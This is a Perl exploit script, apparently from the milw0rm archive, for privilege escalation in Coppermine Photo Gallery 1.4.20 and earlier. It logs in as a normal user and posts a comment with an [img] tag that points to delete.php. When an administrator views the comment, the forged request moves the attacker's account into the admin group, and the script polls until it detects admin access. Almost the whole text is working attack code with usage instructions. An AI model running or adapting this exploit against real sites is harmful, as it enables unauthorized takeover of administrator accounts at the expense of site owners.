Coppermine Photo Gallery <= 1.4.20 (IMG) Privilege Escalation Exploit#!/usr/bin/perl
#inphex - inphex0 at gmail dot com
#based on http://milw0rm.com/exploits/8114 - found by StAkeR
#In case this does not work check out pos(Line 80) and find another value for it
use IO::Socket;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Cookies;
$_1 = shift; #[HOST]
$h = ($_1 eq ``?($n = 0):($n = 1));
$_2 = shift; #[PATH]
$_3 = shift; #[ID]
$_4 = shift; #[ALBUMNUM]
$_5 = shift; #[USER]
$_6 = shift; #[PASS]
$d_p = 80;
if (!$_1 || !$_2 ||!$_3 ||!$_4 ||!$_5 ||!$_6) {
	print `perl coppermine host /path/ youruserid albumnum yourusername yourpassword\n`;
	print `perl coppermine host.com /path/ 3 2 inphex 123456`;
	exit;
}
if ($h) {
	$socket = IO::Socket::INET->new(Proto => `tcp`,PeerAddr => $_1, PeerPort => $d_p) or die(`[-]ERROR`);
	print $socket `GET $_2 HTTP/1.1\n`;
    print $socket `Host: $_1\n`;
    print $socket `Accept: */*\n`;
    print $socket `Connection: close\n\n`;

	while ($answer = <$socket>) {
		$f_answer = $f_answer.$answer;
	}
	$url = &amp;gen_url($_1,$_2,$_3);
	if ($url) {
		$code = &amp;gen_code($url);
		$res = &amp;_send($_1,$_2,$_3,$_4,$code,$_5,$_6);
	}

}

sub gen_url($$$) {
	$h = shift;
	$p = shift;
	$i = shift;
	$url = `http://`.$_1.$_2.`delete.php?id=u`.$i.`&amp;u`.$i.`=&amp;action=change_group&amp;what=user&amp;new_password=&amp;group=1&amp;delete_files=no&amp;delete_comments=no`;
	return $url;
}
sub gen_code($) {
	$url = shift;
	$code = `yoyoyo[img]`.$url.`[/img]`;
	return $code;
}
sub _send($$$$$$$) {
	$h = `http://`.shift;
	$p = shift;
	$i = shift;
	$aid = shift;
	$co = shift;
	$u = shift;
	$pass = shift;

	$xpl = LWP::UserAgent->new() or die;
	$cookie_jar = HTTP::Cookies->new();
	$xpl->cookie_jar( $cookie_jar );
	
	$login = $xpl->post($h.$p.'login.php?referer=index.php',
		Content => [
		`username` => $u,
		`password` => $pass,
		`submitted` => `Login`,
		 ],);
	if($cookie_jar->as_string) {
		$c = 1;
		print `[+]Connected\n`;
		print `[+]Logged in\n`;
	}else {
		$c = 0;
	}
	
	if ($c) {
		$con = get(``.$h.$p.`displayimage.php?album=`.$aid.`&amp;pos=0`); #pos may be changed
		if ($con =~m/addfav\.php\?pid=(.*?)\&amp;amp/) {
			$p_id = $1;

		}

	}
	
	$se = $xpl->post($h.$p.'db_input.php',Content_Type => 'form-data',
		Content => [
		'msg_author'  => $u,
		'msg_body' => $co,
		'event' => 'comment',
		'pid' => $p_id,
		'submit' => `OK`,
		],);
	print `[+]Comment sent\n`;
	print `[/]Waiting for admin to view\n`;
	$| = 0;
	while (1) {
		sleep(20);
		syswrite STDOUT,`-`;
	    $xpl1 = LWP::UserAgent->new() or die;
	    $cookie_jar1 = HTTP::Cookies->new();
	    $xpl1->cookie_jar( $cookie_jar1 );
		$_con = get(``.$h.$p.`logout.php?referer=index.php`);
		$login = $xpl1->post($h.$p.'login.php?referer=index.php',
		    Content => [
		    `username` => $u,
		    `password` => $pass,
		    `submitted` => `Login`,
			],);

		$const = $xpl1->get($h.$p.`index.php`);
		if ($const->as_string =~m/Config/) {
			print `\n[+]You just gained Admin Privileges`;
			exit;
		}
	}
}

# milw0rm.com [2009-02-26]